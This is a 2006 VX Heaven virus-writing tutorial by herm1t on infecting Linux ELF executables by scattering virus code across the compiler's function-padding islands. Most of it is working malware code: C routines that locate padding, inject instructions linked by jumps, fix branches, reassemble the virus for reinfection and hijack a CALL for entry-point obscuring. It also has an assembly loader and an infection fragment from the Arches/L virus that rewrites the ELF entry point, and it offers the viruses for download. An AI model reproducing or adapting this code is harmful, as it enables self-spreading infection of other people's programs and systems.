Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Infecting ELF-files using function padding for Linux

herm1t
August 2006

1
[Back to index] [Comments]

Introduction

Not so long ago, i have read two articles concerned with amusing method of ELF-file infection [1,2], I want to talk about. It's amazing, but the tools presented by Z0mbie and Ares both intended to injecting trojans, and I still didn't saw any viruses using this technology, though may be I looked in the wrong direction. :-) Method is unusual and has both advantages and disadvantages, but let's discuss everything step by step.

In order to increase the perfomance of code the compiler will align functions, cycles, access to data and stack on the boundary multiple by power of two. You may see the alignment options of gcc by `cc1 --help`, but we will focus on how all these look like in code. Let's see:

805cb99: 89 0d 10 0e 0e 08    mov    %ecx,0x80e0e10
805cb9f: 89 ec                mov    %ebp,%esp
805cba1: 5d                   pop    %ebp		; one function ended
805cba2: c3                   ret			; here
805cba3: 8d b6 00 00 00 00    lea    0x0(%esi),%esi	; *padding*
805cba9: 8d bc 27 00 00 00 00 lea    0x0(%edi),%edi	; *padding*
805cbb0: 55                   push   %ebp		; here the next one
805cbb1: 89 e5                mov    %esp,%ebp		; begins

As much as thirteen bytes in a single function! Precisely these islands of free space we will use to write our code to. We will infect the file as follows:

  1. Get our code from the current process memory
  2. Remove the linking jumps from it
  3. Find a victim
  4. Open the victim, map it into memory, check it, find the .text section
  5. Look there for all the free space islands
  6. Try to insert our code instruction by instruction into the found islands, linking them together with "jmp near"
  7. Fix all conditional and uncoditional branch instructions (JMP/Jcc/CALL)
  8. Fix the headers or the code of the victim, so that the virus will receive the control upon execution

What we will get as a result? Here is what the virus loader injected in bash look like:

805c1f3:	60                   	pusha  
805c1f4:	68 78 65 00 00       	push   $0x6578
805c1f9:	e9 25 03 00 00       	jmp    805c523 		---+
.......		..............		..................	   |
805c523:	68 6c 66 2f 65       	push   $0x652f666c	<--+
805c528:	e9 1b 02 00 00       	jmp    805c748 		---+
.......		..............		..................	   |
805c748:	e9 c6 00 00 00       	jmp    805c813 		<==|
805c74d:	90                   	nop    			   |
805c74e:	90                   	nop    			   |
805c74f:	90                   	nop    			   |
.......		..............		..................	   |
805c813:	68 63 2f 73 65       	push   $0x65732f63	<--+
805c818:	e9 06 03 00 00       	jmp    805cb23 		---+
.......		..............		..................	   |
805cb23:	68 2f 70 72 6f       	push   $0x6f72702f	<--+
805cb28:	6a 05                	push   $0x5
805cb2a:	58                   	pop    %eax
805cb2b:	e9 73 00 00 00       	jmp    805cba3 		---+
								   |
.......		..............		..................

.......		..............		..................
8060708:	e9 47 01 00 00       	jmp    8060854		---+
806070d:	90                   	nop    			   |
806070e:	90                   	nop    			   |
806070f:	90                   	nop    			   |
.......		..............		..................	   |
8060854:	68 10 b5 05 08       	push   $0x805b510	<--+
8060859:	c3                   	ret    

New entry point: 0x805c1f3
Old entry point: 0x805b510

Let's consider each step individually.

Looking for the free space

As a preliminary we'll examine the list of instructions used for alignment (from the binutils, file gas/config/tc-i386.c):

    {0x90};                                     /* nop                  */
    {0x89,0xf6};                                /* movl %esi,%esi       */
    {0x8d,0x76,0x00};                           /* leal 0(%esi),%esi    */
    {0x8d,0x74,0x26,0x00};                      /* leal 0(%esi,1),%esi  */
    {0x90,                                      /* nop                  */
     0x8d,0x74,0x26,0x00};                      /* leal 0(%esi,1),%esi  */
    {0x8d,0xb6,0x00,0x00,0x00,0x00};            /* leal 0L(%esi),%esi   */
    {0x8d,0xb4,0x26,0x00,0x00,0x00,0x00};       /* leal 0L(%esi,1),%esi */
    {0x90,                                      /* nop                  */
     0x8d,0xb4,0x26,0x00,0x00,0x00,0x00};       /* leal 0L(%esi,1),%esi */
    {0x89,0xf6,                                 /* movl %esi,%esi       */
     0x8d,0xbc,0x27,0x00,0x00,0x00,0x00};       /* leal 0L(%edi,1),%edi */
    {0x8d,0x76,0x00,                            /* leal 0(%esi),%esi    */
     0x8d,0xbc,0x27,0x00,0x00,0x00,0x00};       /* leal 0L(%edi,1),%edi */
    {0x8d,0x74,0x26,0x00,                       /* leal 0(%esi,1),%esi  */
     0x8d,0xbc,0x27,0x00,0x00,0x00,0x00};       /* leal 0L(%edi,1),%edi */
    {0x8d,0xb6,0x00,0x00,0x00,0x00,             /* leal 0L(%esi),%esi   */
     0x8d,0xbf,0x00,0x00,0x00,0x00};            /* leal 0L(%edi),%edi   */
    {0x8d,0xb6,0x00,0x00,0x00,0x00,             /* leal 0L(%esi),%esi   */
     0x8d,0xbc,0x27,0x00,0x00,0x00,0x00};       /* leal 0L(%edi,1),%edi */
    {0x8d,0xb4,0x26,0x00,0x00,0x00,0x00,        /* leal 0L(%esi,1),%esi */
     0x8d,0xbc,0x27,0x00,0x00,0x00,0x00};       /* leal 0L(%edi,1),%edi */
    {0xeb,0x0d,0x90,0x90,0x90,0x90,0x90,        /* jmp .+15; lotsa nops */
     0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
 

We will search the above signatures with their checksum and length, which will reduce the table size. To lower the count of the false matches we will set the following restrictions:

  1. The island we are going to use is located in the .text section.
  2. If it is not a jmp .+15/nop/... it must be preceded by C3 (RET).
  3. The island should start on the instruction boundary.
  4. The found island (without RET/JMP commands) should be at least 6 bytes long (there'll be the "jmp near" to the next island in the end of each island except one or more of our instructions).

InfELF uses more complicated search algorithm, but the one of ours gives reasonably good result, and need less memory and time.

To satisfy the third condition we'll use the length disassembler, mlde32 by uNdErX for instance. The found islands we'll place in the single linked list sorted by offsets:

typedef struct _island island_t;
struct __attribute__((packed)) _island {
        uint32_t        offset;         /* offset  */
        uint32_t        length;         /* length */
        island_t        *next;          /* the next item in the list */
};
 

We'll store the signatures in the patterns array:

struct {
        int             length;         /* length */
/* the offset within the found island
   from which we can place our code (1) */

        int             shift;         
        uint32_t        crc32;          /* checksum */
} patterns[] = {
        {15,    1,0x11d50a7f},
        {14,    1,0xe4ad564a},
        {15,    2,0xd5cae9dc},          // EB 0D 90 90 ...
        {13,    1,0xd6b6dcfd},
        {12,    1,0x19fbc1f4},
        {11,    1,0x34a6685b},
        {10,    1,0x74d8dd25},
        {9,     1,0x6ed89f27},
        {8,     1,0xb7109f48},
        {7,     1,0x5d30a0da},          // C3 8D B6 00 00 00 00
};
 

(1) We need patterns.shift to satisfy the fourth condition. The first bytes of the signatures are either C3 (RET), or EB 0D (jmp .+15) we should not erase. Therefore, to obtain the offset and the length of the free space island we'll add shift to the offset and substract it from the length.

Here is the C code for the search routine:

        island_t        *islands = NULL, *p, *tail;
        unsigned char   *ptr = m + text_offset;
        int             op_len;
        while (ptr < m + text_offset + text_size) {
                for (i = 0; i < 10; i++)
                        if (crc32(ptr, patterns[i].length) == patterns[i].crc32) {
                                p = (island_t*)malloc(sizeof(island_t));
                                p->offset = (uint32_t)(ptr + patterns[i].shift);
                                p->length = patterns[i].length - patterns[i].shift;
                                p->next = NULL;
                                if (islands == NULL)
                                        islands = p;
                                else
                                        tail->next = p;
                                tail = p;
                                ptr += patterns[i].length;
                                continue;
                        }
                if ((op_len = mlde32(ptr)) <= 0) {
                        fprintf(stderr, "Illegal instruction!\n");
                        return 2;
                }
                ptr += op_len;
        }
 

To satisfy the first condition we have to know the offset of the .text section in the file, its size and address. Let's walk through the file headers. The e_shstrndx field in the ELF file header hold the index of the string table section in the section headers table, and e_shnum the number of sections. We are interested in the following fields of the elements of section table:

sh_name
offset in the string table of the section name
sh_offset
offset of the section in file
sh_addr
address of the section in memory
sh_size
size of the section

The C code that will find the .text section:

        // m - the pointer to the mmaped file
        Elf32_Ehdr      *ehdr = (Elf32_Ehdr*)m;
        Elf32_Shdr      *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff), *s;
        uint32_t        strtab, text_addr, text_size, text_offset = 0;
        char            *name;
        int             i;
        // does the file have the string table?
        if (ehdr->e_shstrndx != SHN_UNDEF) {
                // get the offset of the string table
                strtab = shdr[ehdr->e_shstrndx].sh_offset;
                // look through all of the section headers
                for (i = 0, s = shdr; i < ehdr->e_shnum; i++, s++) {
                        name = m + strtab + s->sh_name;
                        // look for the section named ".text"
                        if (!strncmp(name, ".text", 5)) {
                                text_addr = s->sh_addr;
                                text_size = s->sh_size;
                                text_offset = s->sh_offset;
                                break;
                        }
                }
        }
 

Code injection

Suppose that all of the virus instructions are stored already in the list of structures named "code", of the following type:

typedef struct _code code_t;
struct __attribute__((packed)) _code {
        uint8_t         *src;   /* address in memory */
        uint8_t         *dst;   /* address in victim map */
        uint32_t        len;    /* length */
        uint8_t         *jmpto; /* destination address of JMP/CALL/Jcc, or 0 */
        code_t          *next;  /* the next structure in list */
};
 

The only thing remaining for us to do is to insert as much commands to each island as possible, fill the "dst" field of "code_t" structures, link the islands together with jumps and fix the branch addresses. Here goes:

    island_t    *i;
    code_t      *c;
    int         n, l;

    for (i = islands, l = 0, c = code; c != NULL; )
        // do we have enough space for the command in the current island
        // (taking in mind the jmp near in the end)
        if (l + c->len <= (i->length - 5)) {
            // save the address (we'll need it later)
            c->dst = i->offset + l;
            // copy the command
            memcpy(c->dst, c->src, c->len);
            // increase the counter of the used space for the
            // current island
            l += c->len;
            // move to the next command
            c = c->next;
        } else {
            // ... there is no space left
           
            // pad the remaining space with NOPs
            for (n = l; n < i->length; n++)
                *(uint8_t*)(i->offset + n) = 0x90;
            // if we have more islands, append the jmp near
            // to the next island
            if (i->next != NULL) {
                *((uint8_t *)(i->offset + l))       = 0xe9;
                *((uint32_t*)(i->offset + l + 1))   = i->next->offset - i->offset - l - 5;
            } else
                // we have no space at all, we can't infect this file...
                exit(2);
            // try to write this command to the next island
            i = i->next;
            l = 0;                            
        }
 

Fix the addresses of the branches:

    for (c = code; c != NULL; c = c->next)
        // for each command with non zero branch address
        if (c->jmpto != 0) {
            // look for the command with the same address
            for (d = code; d != NULL; d = d->next)
                if (c->jmpto == d->src) {
                    // fix the address
                    *((uint32_t*)(c->dst + c->len - 4)) = d->dst - c->dst - c->len;
                    break;
                }
            // not found. :-( the jump in the program leading to nowhere
            // will crash the program for sure. stop this until it's too late...
            if (d == NULL)
                exit(2);
        }
 

Reconstructing our own code

Here we came to the last and the most rugged part of the technology: we infected one file and to infect the next one we need to find our own code scattered through the file, reassemble it and remove the linking jumps out of it. We'll need for that the length disassembler, the virus entry point (we'll start disassembling from there) and the label at the end of the virus denoting that it's time to stop. To determine our own entry point we can not use the traditional virus mantra:

virus_start:    pusha
                ...
                call    delta
delta:          pop     ebp
                sub     ebp, (delta - virus_start)
 

Because all three commands (say nothing of the preceding) might lay in the hundreds of instructions one from another, that's why we will write our entry point to the body of the virus at the stage of infection. To identify where to, let's choose some command which will occure in our code only once, let it be "mov esp, ?":

                mov     eax, esp                        ; save esp
                mov     esp, virus_start                ; here we will write
                                                        ; our new entry point
                mov     [ebp + virus_entry], esp        ; save to variable
                mov     esp, eax                        ; restore esp
 

And the HLT instruction will be a signal for the disassembler that the virus has ended and it's time to return the result. We have another similar problem: when the work is done the virus must return the control to the infected host, if we use the "jmp near" command for that, we need to distinguish it from the other JMPs, to prevent the disassembler to follow it to the main program. We can place this jump immediately before the HLT and add the corresponding adjustment. And generally we can use the PUSH/RET instead of jump (we'll examine such possibility also).

code_t *code = NULL, *code_ret = NULL, code_vep = NULL;

void reassemble(uint8_t *ptr) {
        code_t  *c, *q;
        int     op_len;

        for (;;) {
                // HLT
                if (*ptr == 0xf4)
                        return;
                // do we already have command with that offset in the list?
                for (c = code; c != NULL; c = c->next) 
                        if (c->src == ptr)
                                return;
                // get the length
                op_len = mlde32(ptr);
                // invalid opcode
                if (op_len <= 0)
                        return;
                // fill the new list element
                c = (code_t*)malloc(sizeof(code_t));
                c->src = ptr;
                c->jmpto = 0;
                c->len = op_len;
                c->next = NULL;
                // insert sort in ascending addresses order
                if (code == NULL || c->src < code->src) {
                        c->next         = code;
                        code            = c;
                } else {
                        q = code;
                        while (q->next != NULL && q->next->src < c->src)
                                q = q->next;
                        c->next = q->next;
                        q->next = c;
                }
                // RET/RETN ?
                if (*ptr == 0xc3 || *ptr == 0xc2)
                        return;
                // memorize the pointer to this element, latter we will
                // write new entry point in the argument of the command
                // MOV ESP, ?
                if (*ptr == 0xbc)
                        code_vep = c;
                // CALL/JMP/Jcc ?
                if (*ptr == 0xe8 || *ptr == 0xe9 || (*ptr == 0x0f && (*(ptr + 1) & 0xf0) == 0x80)) {
                        // calculate the branch address
                        c->jmpto = ptr + op_len + *((uint32_t*)(ptr + op_len - 4));
                        // jmp?
                        if (*ptr == 0xe9) {
                                // if the HLT is follows, than this is
                                // "jmp old_entry_point". memorize the address
                                // of this element and increase the length for
                                // HLT to be copied along with the jmp
                                // as single instruction
                                if (*(ptr + 5) == 0xf4) {
                                        code_ret = c;
                                        c->jmpto = 0;
                                        c->len++;
                                } else {
                                        // go to the calculated address
                                        ptr = c->jmpto;
                                        continue;
                                }
                        } else {
                                // CALL/JCC
                                // recursive call. exit either after RET, or after
                                // already disassembled instruction, or after the
                                // end of the virus
                                reassemble(c->jmpto);
                        }
                }
                // move to the next command
                ptr += op_len;
        }
}
reassemble(virus_entry);
 

The virus code should not contain JMP/Jcc SHORT/LOOP/LOOPxx,JECXZ instructions. It is most likely that after injection the destination addresses of these commands will come out of range of +-128 bytes. Naturally, we can replace the above commands with their NEAR equivalents at runtime, but such replacements has any meaning only in the case when we are going not only to expand short commands to near, but also the reverse (otherwise the code doing the replacements will be executed once and will not be used further). Since we have not enough resources for the multipass optimization of code we will avoid the instructions listed above.

Now we need to remove the linking jumps from the reconstructed code. Since the list is sorted, it's sufficient to check is the jump pointing to the next command in list, if so, we can remove it. Like this:

        for (prev = code, c = code->next; c->next != NULL; c = c->next)
                if (c->src[0] != 0xe9 || c->jmpto != c->next->src) {
                        prev->next = c;
                        prev = c;
                }
        prev->next = c;
 

Fixing the headers

A very little more is left to do: save the addresses we need in the body of the virus and fix the ELF-file header, so that entry point will refer to the begining of the virus. Break through the all necessary calculations:

#define DST2VADDR(x)    (x - m - text_offset + text_addr)
        // code is the first command of virus, code->dst is the new entry point
        // we'll save it in the virus body (for disassembler).
        // code_vep, the pointer to the "mov esp, ?" we memorized
        // at the stage of disassembly
        *((uint32_t*)(code_vep->dst + 1)) = DST2VADDR(code->dst);
        // write the jump argument for return to the old entry point
        // code_ret, the pointer to the jump command we memorized
        // at the stage of disassembly
        *((uint32_t*)(code_ret->dst + 1)) =
                ehdr->e_entry - DST2VADDR(code_ret->dst) - 5;
        ehdr->e_entry   = DST2VADDR(code->dst);
 

What else we can do?

It's easy enough to add the EPO (entry point obscuring) to the infection routine described above. We need to add the following fragment to the free space search routine (we're looking through the file anyway, why not to find at the same time the instruction we can hang on):

        uint8_t *firstcall = NULL;
       
        //...
        if (firstcall == 0 && *ptr == 0xe8)
                firstacall = ptr;
        for (i = 0; i < 10; i++)
        //...
 

And make over the final part (described in the previous chapter) in the following way:

        // didn't found any call
        if (firstcall == NULL)
                exit(2);
        // calculate and save in code_ret the address the call pointed to
        *((uint32_t*)(code_ret->dst + 1)) = DST2VADDR(firstcall) +
                *((uint32_t*)(firstcall + 1)) - DST2VADDR(code_ret->dst);
        // update the CALL, so it will point to us
        *((uint32_t*)(firstcall + 1)) =
                DST2VADDR(code->dst) - DST2VADDR(firstcall) - 5;
 

All done. We don't touch entry point. Quite naturally, it wouldn't be the first CALL, or not a CALL, but JMP, and not a JMP, but whatever you want. But that all is up to you.

Completely or by pieces?

Let's look with fpstat how many space is available in average ELF-file:

        $ for i in /bin/*;do ./fpstat $i;done|
        > awk 'BEGIN{a=0;c=0}/^Total/{if($2>0){c++;a+=$2}}END{print a,c,a/c}'
        35740 84 425,476
 

It's a shade better with /usr/bin, but by a negligible margin:

590556 1368 431,693

So the bona fide programs are ready to donate 430 bytes on the average to our virus. It's possible to optimize the virus, but not at such degree. We can limit the infection to the large files like bash, vim or php, but also we can inject into the file only the loader and put the whole virus body in the end of the file, like it was suggested in [2]. The loader must:

  1. Open the file in which it resides (/proc/self/exe)
  2. Map the end of the file into memory, starting from offset file_length - virus_length, with attributes PROT_READ|PROT_EXEC (the offset must be aligned on page boundary or mmap will fail).
  3. Transfer control to the address immediately following the loader, but in the mmaped file.

Here comes:

_start:         pusha
; h = open ("/proc/self/exe", O_RDONLY);
                push    dword 0x00006578
                push    dword 0x652f666c
                push    dword 0x65732f63
                push    dword 0x6f72702f
                movb    eax, SYS_open
                mov     ebx, esp
                movb    ecx, 0
                int     0x80
                add     esp, byte 16
                or      eax,eax
                js      near exit
                xchg    eax,ebx

; l = lseek (h, 0, 2);
                movb    eax, SYS_lseek
                movb    ecx, 0
                movb    edx, 2
                int     0x80
                or      eax, eax
                js      near exit

; l -= VIRUS_SIZE;
                sub     eax, VIRUS_SIZE

; a = mmap(NULL,VIRUS_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE,h,l);
                mpush   eax, ebx, MAP_PRIVATE, PROT_READ|PROT_EXEC,VIRUS_SIZE,0
                mov     ebx, esp
                movb    eax, SYS_mmap          
                int     0x80                            
                add     esp, byte 24
                cmp     eax, 0xfffff000
                ja      near exit
                lea     ebx, [eax + (run - _start)]
; this instruction the disassembler will leave unattended (for good)
                jmp     ebx
; to exit. the disassembler will stop where.
                jmp     near exit
        run:
; save the virus entry point for disassembler (also we can map the
; file to the fixed address and than, we just need to replace the
; "self" variable with the choosen address)
                push    eax
                ...

                pop     edx
                mov     self, edx
                push    edx
                call    reassemble
                ...

exit:           popa
; here, like it was promissed we are using the PUSH/RET to return
; the conmtrol to the host. HLT is not needed, disassembler will
; return on RET.
                db      0x68
__code_ret:     dd      fake_host
                ret
 

By the way, we no more need the special cases for the HLT and saving the virus entry point in the body of the virus, so we can remove the following fragments:

        //...
        if (*ptr == 0xf4)
                return;
        //...
        if (*ptr == 0xbc)
                code_vep = c;
        //...
                        if (*(ptr + 5) == 0xf4) {
                                code_ret = c;
                                c->len++;
                        }
        //...
 

Now let's look what changes we have to do in the virus itself:

  1. Align the file, so it length will be multiple of page size
  2. Write the virus body at the end of file
  3. Save the old entry point in file
  4. Change the entry point

The fragment of the Arches/L virus:

                ; enlarge the file, so the length will be multiple of page size
                movb    eax, SYS_ftruncate
                mov     ebx, file_handle
                mov     ecx, file_length
                add     ecx, 4095
                and     ecx, 0xfffff000
                mov     edi, ecx
                int     0x80
                or      eax, eax
                jnz     near unmap
                ; move the pointer to the end
                movb    eax, SYS_lseek
                movb    edx, 0                          ;SEEK_SET
                int     0x80
                cmp     eax, ecx
                jne     near unmap
                ; write the virus body
                movb    eax, SYS_write
                mov     ecx, self
                mov     edx, VIRUS_SIZE
                int     0x80
                cmp     eax, edx
                jne     near unmap
                ; move the pointer to the argument of PUSH command
                movb    eax, SYS_lseek
                mov     ecx, -VIRUS_SIZE + (__code_ret - _start)
                movb    edx, 1                          ; SEEK_CUR
                int     0x80
                ; write the old entry point
                mov     esi, file_map
                mov     edx, [esi + e_entry]
                push    edx
                mov     eax, SYS_write
                mov     ebx, file_handle
                mov     ecx, esp
                movb    edx, 4
                int     0x80
                add     esp, edx
                cmp     edx, eax
                jne     near unmap
                ; calculate the new entry point
                mov     eax, code
                mov     eax, [eax + code_dst]
                sub     eax, esi
                sub     eax, text_offset
                add     eax, text_addr
                ; change the entry point in the ELF header
                mov     [esi + e_entry], eax
 

That's all, you comments is welcome. herm1t@vx.netlux.org

Download Arches,Arches/L viruses and the utilities

References

  1. Z0mbie "Injected Evil", 2002
  2. Ares "Static linked ELF infecting", 2004
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua